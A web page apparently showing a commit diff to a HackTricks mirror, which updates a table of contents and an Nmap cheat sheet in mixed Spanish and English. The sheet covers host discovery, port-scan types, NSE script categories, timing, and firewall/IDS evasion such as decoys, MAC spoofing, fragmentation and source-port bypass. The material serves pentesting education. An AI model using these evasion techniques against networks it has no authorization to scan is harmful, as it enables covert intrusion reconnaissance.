0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GITBOOK-4048: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-08-24 08:49:18 +00:00 committed by gitbook-bot
parent 5337830aff
commit 9f7b965e16
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
10 changed files with 241 additions and 188 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
SUMMARY.md
View File

@ -538,7 +538,8 @@
* [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md)
* [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
* [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md)
* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md)
* [SS-Leaks](pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md)
* [Dependency Confusion](pentesting-web/dependency-confusion.md)
* [Deserialization](pentesting-web/deserialization/README.md)
* [NodeJS - \_\_proto\_\_ & prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md)

231
generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
View File

@ -1,103 +1,78 @@
# Nmap Summary (ESP)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
```text
```
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
```
**-iL** lista\_IPs
## Parameters
**-iR** numero --&gt; Número de Ips aleatorias, se pueden excluir posibles Ips con **--exclude &lt;Ips&gt;** o **--excludefile &lt;fichero&gt;**
### IPs to scan
**Descubrimiento de equipos:**
* **`<ip>,<net/mask>`:** Indicate the ips directly
* **`-iL <ips_file>`:** list\_IPs
* **`-iR <number>`**: Number of random Ips, you can exclude possible Ips with `--exclude <Ips>` or `--excludefile <file>`.
Podemos usar máscaras/24
### Equipment discovery
**-sL**: No es invasivo, lista los objetivos realizando peticiones de DNS para resolver nombres. Sirve para saber si por ejemplo www.prueba.es/24 todas las Ips son objetivos nuestros.
By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
Por defecto Nmap lanza una fase de descubrimiento que consta de: -PA80 -PS443 -PE -PP
* **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets.
* **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase.
* **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped.
* **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`.
* **`-PS <ports>`**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80.
* **`-PA <ports>`**: Like the previous one but with ACK, combining both of them gives better results.
* **`-PU <ports>`**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable.
* **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active.
* **`-PY<ports>`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied.
* **`-PO <protocols>`**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up.
* **`-n`**: No DNS
* **`-R`**: DNS always
**-Pn** No ping --&gt; útil **si se sabe que todos están activos** \(sino lo estuviera alguno se podría perder mucho tiempo, pero también saca falsos negativos esta opción diciendo que no esta activo\), impide la fase de descubirmiento
### Port scanning techniques
**-sn** No port scan: Tras completar fase de reconocimiento **no analiza puertos.** Es relativamente sigilosa, y permite un pequeño reconocimiento de la red. Con privilegios envía un ACK \(-PA\) al 80, un SYN\(-PS\) al 443 y un echo request y un Timestamp request, sin privilegios siempre completa conexiones. Si el objetivo es de la red, solo usa ARP\(-PR\). Si se usa con otra opción solo se lanzan los paquetes de la otra opción.
* **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default.
* **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges.
* **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time.
* **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes.
* **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed.
* **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around.
* **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets.
* **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls.
* **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open.
* **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered.
* **`-b <server>`:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\<user>:\<password>@]\<server>\[:\<port>] Almost all ftps servers no longer let you do this and therefore it is of little practical use.
**-PR** Ping ARP: Se usa por defecto cuando se analizan equipos de nuestra red, es más rápido que usar pings. Si no se quiere usar paquetes ARP hay que usar --send-ip.
### **Centrar análisis**
**-PS&lt;puertos&gt;** SYN: envía paquetes de SYN a los que si responde SYN/ACK es que esta abierto\(al que se reponde con RST para no acabar la conexión\), si responde RST esta cerrado y si no responde es inalcanzable. En caso de no tener privilegios automáticamente se usa una conexión total. Si no se dan puertos, lo lanza al 80.
**-PA&lt;puertos&gt;** ACK: Como la anterior pero con ACK, combinando ambas se obtienen mejores resultados.
**-PU&lt;puertos&gt;** UDP: El objetivo es el contrario, se envían a puertos que se espera que estén cerrados. Algunos firewall solo revisan conexiones TCP. Si está cerrado se responde con port unreachable, si se responde con otro icmp o no se responde se deja como destino inalcanzable.
**-PE, -PP, -PM** PINGS ICMP:echo replay, timestamp y addresmask. Se lanzan para descubrir si el objetivo esta activo
**-PY&lt;puertos&gt;** SCTP: Envía sondas SCTP INIT al 80 por defecto, se puede responder INIT-ACK\(abierto\) o ABORT\(cerrado\) o nada o ICMP inalcanzable\(inactivo\)
-**PO&lt;protocolos&gt;:** Se indica un protocolo en las cabeceras, por defecto 1\(ICMP\), 2\(IGMP\) y 4\(Encap IP\). Para los protocolos ICMP, IGMP, TCP \(6\) Y UDP \(17\) se envían las cabeceras del protocolo, para el resto solo se envía la cabecera IP. EL objetivo de esto es que por la malformación de las cabeceras, se responda Protocolo inalcanzable o respuestas del mismo protocolo para saber si está levantado.
**-n** No DNS
**-R** DNS siempre
**Técnicas de escaneo de puertos:**
**-sS** --&gt; No completa la conexión por lo que no deja rastro, muy buena si se puede usar. \(privilegios\) Es la que se usa por defecto
**-sT** --&gt; Completa la conexión, por lo que sí que deja rastro, pero seguro que se puede usar. Por defecto sin privilegios.
**-sU** --&gt; Más lenta, para UDP. Ppalmente: DNS\(53\), SNMP\(161,162\), DHCP\(67 y 68\), \(-sU53,161,162,67,68\): abierto\(respuesta\), cerrado\(puerto inalcanzable\), filtrado \(otro ICMP\), abierto/filtrado \(nada\). En caso de tener abierto/filtrado, -sV envía numerosas peticiones para detectar alguna de las versiones que nmap soporta pudiendo detectar el auténtico estado. Aumenta mucho el tiempo.
**-sY** --&gt; Protocolo SCTP no llega a establecer la conexión, por lo que no hay registros, funciona como -PY
**-sN,-sX,-sF** --&gt; Null, Fin, Xmas, sirven pueden penetrar algunos firewall y sacar información. Se basan en que los equipos que cumplan el estándar deberán responder con RST todas las peticiones que no tengan levantadas los lags de SYN, RST o ACK: abierto/filtrado\(nada\), cerrados\(RST\), filtrado \(ICMP inalcanzable\). No fiable en WIndows, CIsco, BSDI y OS/400. En unix sí.
**-sM Maimon scan:** Envía flags FIN y ACK, usado para BSD, actualmente devolverá todo como cerrado.
**-sA, sW** --&gt; ACK y Window, sirve para detectar firewalls, para saber si los puertos están filtrados o no. El -sW sí distingue entre abiertos/cerrados ya que los abiertos responden con un valor de window distinto: abiertos\(RST con ventana distinto de 0\), cerrado \(RST ventana = 0\), filtrado \(ICMP inalcanzable o nada\). No todos los equipos funcionan así, así que si sale todo cerrado, es que no funciona, si salen unos pocos abiertos es que funciona bien, y si salen muchos abiertos y pocos cerrados, es que funciona al revés.
**-sI Idle scan** --&gt; Para los casos en los que hay un firewall activo pero que sabemos que este no filtra a una determinada Ip \(o cuando queremos simplemente anonimato\) podemos usar el escáner zombie \(sirve para todos los puertos\), para buscar posibles zombies podemos usar el scrpit ipidseq o el exploit auxiliary/scanner/ip/ipidseq. Este escaner se basa en el número IPID de los paquetes IP
**--badsum --&gt;** Envían la suma mal, los equipos descartarían los paquetes, pero los firewall podrían responder algo, sirve para detectar firewalls
**-sZ** --&gt; Escaner “raro” de SCTP, al enviar sondas con fragmentos cookie echo deben ser eliminadas si esta abierto o respondidas con ABORT si cerrado. Puede traspasar firewalls que no traspasa el init, lo malo es que no distingue entre filtrado y abierto.
**-sO** --&gt; Protocol Ip scan: Envía cabeceras mal y vacías en las que a veces no se distingue ni el protocolo. Si llega ICMP unreachable protocol esta cerrado, si llega unreachable port esta abierto, si llega otro error, filtrado, si no llega nada, abierto\|filtrado
**-b&lt;servidor&gt;** FTPhost--&gt; Sirve para escanear un host desde otro, eso lo hace conectándose el ftp de otra máquina y pidiendole que envía archivos a los puertos que se quiera escanear de otra máquina, según las respuestas sabremos si están abiertos o no. \[&lt;usuario&gt;:&lt;contraseña&gt;@\]&lt;servidor&gt;\[:&lt;puerto&gt;\] Casi todos los servidores ftps ya no dejan hacer esto y por lo tanto ya tiene poca utilidad práctica,
**Centrar análisis:**
**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** \(fast scan\) analiza los 100 ppales. Con **--top-ports &lt;numero&gt;** Analiza ese numero de ppales \(de 1 hasta los 65335\). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024\] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio &lt;ratio&gt;** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1
**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** (fast scan) analiza los 100 ppales. Con **--top-ports \<numero>** Analiza ese numero de ppales (de 1 hasta los 65335). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio \<ratio>** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1
**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7.
**--version-intensity &lt;numero&gt;** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP
**--version-intensity \<numero>** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP
**-O** Deteccion de os
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os \(ahorra tiempo\)
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo)
**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
**Scripts**
--script _&lt;filename&gt;_\|_&lt;category&gt;_\|_&lt;directory&gt;_\|_&lt;expression&gt;_\[,...\]
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
Para usar los de por efecto vale con -sC o --script=default
@ -108,108 +83,108 @@ Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, ext
* **Discovery:** recupera información del _target_ o víctima
* **External:** _script_ para utilizar recursos externos
* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ \(puertas traseras\)
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras)
* **Safe:** ejecuta _scripts_ que no son intrusivos
* **Vuln:** descubre las vulnerabilidades más conocidas
* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles
Para buscar scripts:
**nmap --script-help="http-\*" -&gt; Los que empiecen por http-**
**nmap --script-help="http-\*" -> Los que empiecen por http-**
**nmap --script-help="not intrusive" -&gt; Todos menos esos**
**nmap --script-help="not intrusive" -> Todos menos esos**
**nmap --script-help="default or safe" -&gt; Los que estan en uno o en otro o en ambos**
**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos**
**nmap --script-help="default and safe" --&gt; Los que estan en ambos**
**nmap --script-help="default and safe" --> Los que estan en ambos**
**nmap --script-help="\(default or safe or intrusive\) and not http-\*"**
**nmap --script-help="(default or safe or intrusive) and not http-\*"**
--script-args _&lt;n1&gt;_=_&lt;v1&gt;_,_&lt;n2&gt;_={_&lt;n3&gt;_=_&lt;v3&gt;_},_&lt;n4&gt;_={_&lt;v4&gt;_,_&lt;v5&gt;_}
\--script-args _\<n1>_=_\<v1>_,_\<n2>_={_\<n3>_=_\<v3>_},_\<n4>_={_\<v4>_,_\<v5>_}
--script-args-file _&lt;filename&gt;_
\--script-args-file _\<filename>_
--script-help _&lt;filename&gt;_\|_&lt;category&gt;_\|_&lt;directory&gt;_\|_&lt;expression&gt;_\|all\[,...\]
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
--script-trace ---&gt; Da info de como va elscript
\--script-trace ---> Da info de como va elscript
--script-updatedb
\--script-updatedb
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --&gt; Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
**Control tiempo**
**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque \(y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque\) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
Se puede cambiar con**--min-hostgroup** _**&lt;numhosts&gt;**_**;** **--max-hostgroup** _**&lt;numhosts&gt;**_ \(Adjust parallel scan group sizes\)
Se puede cambiar con\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Adjust parallel scan group sizes)
Se puede controlar el numero de escaners en paralelo pero es mejor que no \(nmpa ya incorpora control automatico en base al estado de la red\): **--min-parallelism** _**&lt;numprobes&gt;**_**;** **--max-parallelism** _**&lt;numprobes&gt;**_
Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**&lt;time&gt;**_**,** **--max-rtt-timeout** _**&lt;time&gt;**_**,** **--initial-rtt-timeout** _**&lt;time&gt;**_
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
Podemos modificar el numero de intentos:**--max-retries** _**&lt;numtries&gt;**_
Podemos modificar el numero de intentos:**--max-retries** _**\<numtries>**_
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**&lt;time&gt;**_
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**\<time>**_
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**&lt;time&gt;**_**;** **--max-scan-delay** _**&lt;time&gt;**_
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**&lt;number&gt;**_**;** **--max-rate** _**&lt;number&gt;**_
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
Para definir lo agresivo que queremos que sea nmap: -T paranoid\|sneaky\|polite\|normal\|aggressive\|insane
Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
-T \(0-1\)
\-T (0-1)
-T0 --&gt; Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
\-T0 --> Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
-T1 y T2 --&gt; Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
\-T1 y T2 --> Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
-T3 --&gt; Funcionamiento por defecto, incluye en paralelo
\-T3 --> Funcionamiento por defecto, incluye en paralelo
-T4 --&gt; --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
-T5 --&gt; --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
**Firewall/IDS**
No dejan pasar a puertos y analizan paquetes.
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu \(con esto, no usar -f\), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu (con esto, no usar -f), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:&lt;numero&gt; Para generar &lt;numero&gt; de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:\<numero> Para generar \<numero> de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
**-e &lt;interface&gt;** Para elegir la interfaz
**-e \<interface>** Para elegir la interfaz
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**&lt;portnumber&gt;**_**;-g** _**&lt;portnumber&gt;**_ _Son equivalentes_
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _Son equivalentes_
**--data** _**&lt;hex string&gt;**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
**--data** _**\<hex string>**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
**--data-string** _**&lt;string&gt;**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
**--data-string** _**\<string>**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
**--data-length** _**&lt;number&gt;**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas \(que se generaran aleatoriamente\)
**--data-length** _**\<number>**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas (que se generaran aleatoriamente)
Para configurar el paquete IP completamente usar **--ip-options**
If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
**--ttl** _**&lt;value&gt;**_
**--ttl** _**\<value>**_
**--randomize-hosts** Para que el ataque sea menos obvio
**--spoof-mac** _**&lt;MAC address, prefix, or vendor name&gt;**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
**--proxies** _**&lt;Comma-separated list of proxy URLs&gt;**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
**--proxies** _**\<Comma-separated list of proxy URLs>**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
**-sP** Para descubrir host en la red en la que estamos por ARP
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular \(como el 20,53 y 67\), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
**Salidas**
@ -233,7 +208,7 @@ Muchos administradores crean una regla en el firewall que permite pasar todos lo
**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
**--open** muestra los abiertos, abiertos\|filtrados y los no filtrados
**--open** muestra los abiertos, abiertos|filtrados y los no filtrados
**--resume file** Saca un resumen
@ -257,18 +232,18 @@ p / P Turn on / off packet tracing
**Vulscan**
Script de nmap que mira las versiones de los servicios obtenidos en una base de datos offline \(que descarga de otras muy importantes\) y devuelve las posibles vulnerabilidades
Script de nmap que mira las versiones de los servicios obtenidos en una base de datos offline (que descarga de otras muy importantes) y devuelve las posibles vulnerabilidades
Las BD que usa son:
1. Scipvuldb.csv \| [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
2. Cve.csv \| [http://cve.mitre.org](http://cve.mitre.org/)
3. Osvdb.csv \| [http://www.osvdb.org](http://www.osvdb.org/)
4. Securityfocus.csv \| [http://www.securityfocus.com/bid/](http://www.securityfocus.com/bid/)
5. Securitytracker.csv \| [http://www.securitytracker.com](http://www.securitytracker.com/)
6. Xforce.csv \| [http://xforce.iss.net](http://xforce.iss.net/)
7. Exploitdb.csv \| [http://www.exploit-db.com](http://www.exploit-db.com/)
8. Openvas.csv \| [http://www.openvas.org](http://www.openvas.org/)
1. Scipvuldb.csv | [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
2. Cve.csv | [http://cve.mitre.org](http://cve.mitre.org/)
3. Osvdb.csv | [http://www.osvdb.org](http://www.osvdb.org/)
4. Securityfocus.csv | [http://www.securityfocus.com/bid/](http://www.securityfocus.com/bid/)
5. Securitytracker.csv | [http://www.securitytracker.com](http://www.securitytracker.com/)
6. Xforce.csv | [http://xforce.iss.net](http://xforce.iss.net/)
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
Para descargarlo e instalarlo en la carpeta de Nmap:
@ -282,22 +257,22 @@ Para usar todos: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
